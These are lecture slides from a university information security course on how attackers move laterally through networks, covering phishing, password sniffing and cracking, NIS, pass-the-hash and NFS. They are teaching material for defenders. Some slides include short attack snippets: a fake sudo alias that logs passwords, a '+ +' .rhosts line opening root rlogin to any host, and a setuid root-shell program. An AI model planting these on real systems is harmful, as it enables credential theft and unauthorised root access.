Network Traversal

Download Report

Transcript Network Traversal

Introduction to
Information
Security
Network Traversal
nirkrako at post.tau.ac.il
itamargi at post.tau.ac.il
Network Traversal Introduction
• We now move from discussing the act of hacking a
single machine or device, to discuss the act of
traversing through an entire network:
o How organized networks are structured.
o How hackers penetrate organized networks, usually administered by a
single person, or team of administrators.
o How hackers traverse the network to gain access to more resources and
data.
Victim Network
Ve
rti
ca
l
Horizontal/Lateral
First Target: Patient 0
• Hackers will try to infect one computer, by different
methods:
o
o
o
o
Chance / statistical Luck!
Spear-phishing or human error.
Social engineering
Pure hacking.
• After infecting patient 0. Hackers can attempt to
launch different types of attacks which can now
depend on the internal network structure.
• By using information and access readily available
on the hacked machine, hackers can attempt to
laterally traverse the network.
Spearphishing
• “Spear phishing is an e-mail spoofing fraud attempt
that targets a specific organization, seeking
unauthorized access to confidential data. Spear
phishing attempts are not typically initiated by
"random hackers" but are more likely to be
conducted by perpetrators out for financial gain,
trade secrets or military information.” -http://searchsecurity.techtarget.com/definition/spe
ar-phishing
An email I received
• True story: I received this email last year. Can you
spot the fail?
Network-wide Users
• In an organized network , each user is given a single
user/password credential, this password is used to
authenticate the user against all machines in the
network which the user should have access to.
• Example: TAU. Your user and password is used to
login to the *n?x machines as well as the video
website.
• If a computer used by one of the users is
compromised. you can use his credentials if gained
to login to all machines in the network.
Sniffing for passwords
•
•
•
•
•
•
•
•
•
•
•
By local example
.bashrc << __EOF__
alias ‘sudo’ ‘/tmp/sudo.sh’
__EOF__
/tmp/sudo.sh << __EOF__
#!/bin/bash
echo “Enter password:”
read PASS
echo $PASS > /tmp/.password.log
sudo $1 $2 $3 $4 $5 $6
__EOF__
Sniffing for passwords
• On windows and other GUI based applications: key
logging is used to record credentials being entered.
• By actually sniffing the network, looking for “telnet”
or other unencrypted communication ways –
communication where passwords are given in clear
text format.
• Sniffing the network traffic looking for hashes which
can later be cracked (More in next slide).
Cracking passwords
• Gaining root access to /etc/shadow (previously
/etc/passwd) leads to obtaining password hashes
• John the Ripper or other password brute forcing
techniques can then be used to retrieve the clear
text password.
• The clear text password can be used to login to
other computers.
• Users tend to use the same password for all
computers and services, making it easy to gain
access to other resources.
rlogin/rsh - history
• Instead of logging in all the time – rlogin/rsh is used to
authenticate a user without the need to enter a password.
• Once a connection is received from a trusted machine and it
declares that the user remotely connecting is the user, the
user automatically gains remote machine access with the
same credentials.
• Many hacking techniques employ:
o
o
echo “+ +” > ~root/.rhosts
This lets anybody from any host connect to the computer.
• IP spoofing can be used to gain remote access as well. And
this poor authentication is still being used in some dark corners
of the world.
• NFS V < 4 has also utilizes the same bad authentication by only
comparing host/port(using identd) to identify the user.
Domain of computers
Unix NIS (Network
Information Service)
• The NIS (formerly known as Yellow Pages/YP)
protocol is and old protocol used to sync passwords
across a network.
• The NIS passwords are used to spread credential of
a network of computers.
• From each of the servers in the network access is
given to a virtual directory which contains files such
as “passwd”/ “shadow”, etc.
• By using shell: # ypcat passwd
o You can get the network hashes of ALL users!
o In a secure network scheme this does not include the root account,
however local account access can be gained on all computers sharing
the passwd file.
Pass the hash
• Passing the hash is an original way of authentication for
SSO (Single Sign On) which is easily exploitable.
• In windows based systems, by simply passing the hash, a
user is able to proove that he has the credentials
needed to gain access to a resource (such as a network
share).
• Once hackers log in to a system, they can use locally
existing network hashes to pass them to other systems by
this process:
o
o
o
o
o
Gain local administrator privileges
View locally logged in accounts.
Impersonate a user locally.
Use regular windows operations to access network resources.
Gain more access and run remote code using psexec (sysinternals utility).
LSASS
• Slide was taking from “WCE Internals by Amplia
Security”
Hash harvesting
•
•
On windows computers, hashes are saved locally even after a
logon session is terminated in case access to the domain is no
longer available.
Several tools are in the wild used to do this hash harvesting, such
as:
o
o
o
o
o
•
WCE and its like:
o
o
•
WCE – Windows Credential Editor
Pass The Hash Toolkit.
gsecdump
Maybe more.
pwdump - hash dumping is also possible localy by dumping the SAM file (Security Accounts
Manager)
User ProcessReadMemory() to read the memory of LSASS for harvesting
Inject code to implement the impersonation of users.
Side Note – cracking NTLM hashes:
o
NTLM aka NT LanMan (Lan Manager) hashes are DES based hashes of max 14 byte passwords:
Each 7 bytes of the password is hashed seperately making it easier instead of 256^14 we get 256^7
* 2. Therefore a rainbow table can be easily created.
Unix NFS (Network File
System)
• The Unix NFS comparable to windows “Sharing”. Is a
method of sharing directories by allowing other to locally
mount a remote directory as if it was their own.
• As we previously learned using u+s and o+x to a file that
hands us root privileges we are able to escalate our
privileges:
o
o
echo "main(){setuid(0);setgid(0);system("/bin/sh");}" > a.c
gcc –o a a.c
• Misconfigured NFS, allows mounted directory to contain
suid files, therefore allowing root on one machine the
ability to gain
o http://packetstorm.wowhacker.com/mag/faith/faith8.txt
Shared binaries patching
• Administrators or users share binaries on network
shares / NFS. (Usually installation files).
• If those network shares are writable by a hacker he
can modify them and then wait for other users to
execute them.
• Example at TAU:
user@nova:~$ mount | grep '/ type'
netapp1:/vol/vol0/linux-root/precise/common/ on / type nfs
(rw,relatime,vers=3,rsize=65536,wsize=65536,namlen=255,hard,nolock,proto=tcp,port=65535,timeo=70,retrans
=3,sec=sys,local_lock=all,addr=132.67.192.53)
More Misc Subjects
• Network based anti-viruses
• Passive DNS
Network based antiviruses
• Network anti-viruses aim to catch malware at endpoints by analyzing aspects of network traffic.
• Companies that provide this service reverse
engineer malware and collect intelligence on how
malwares operate from a network perspective.
• Input is made into blacklist rules such as:
o Command and Control Domains
o Command and control Ips
o Specific looking URLs
Passive DNS
•
•
•
•
•
•
•
•
Security researchers have been collecting IP-Host pairs for a few
years now.
This is done using instrumented programs installed by ISPs at their
DNSs.
The Host-IP pairs can be used to back-track hackers’ resources.
For example, if hacker A uses domain blblbfizzly.com , we can
now blacklist it.
we look it up in passive dns to find ip pairs we find it matches the
following IPs: 8.8.8.8 and 8.8.4.4.
We can look up in th e same database for pairs with 8.8.4.4 we
find it matches gogogofizzly.com and bijo888rocks.com
Now without much more information, you would educatedly
guess that gogogofizzly.com is being used by the same hacker A,
therfeore we can blacklist it to.
Virustotal.com has a publicly query-able passive database but it
is an incomplete one.
Random Practical Subjects
Not Covered
• Honey pots
o File based
o Computer based
o Network based
• Penetration testing
o Metasploit
o Nessus
• SIEM/SOC Systems
o Sinkholes.
• Security Resources:
o CVE
o Virustotal
• Security Patches
o 0-Day Gap.
• Command and Control Channels
• Many more…
Questions?
Good Luck in the Test!
• The test is hard.
• You will need to prepare a folder with this semesters
material and bookmarks for subjects!
• Hopefully, there will be a 3 hour rehearsal exercise
before the test.
• Feel free to drop by us questions and ask for help.
• No homework for you, come back 1 year!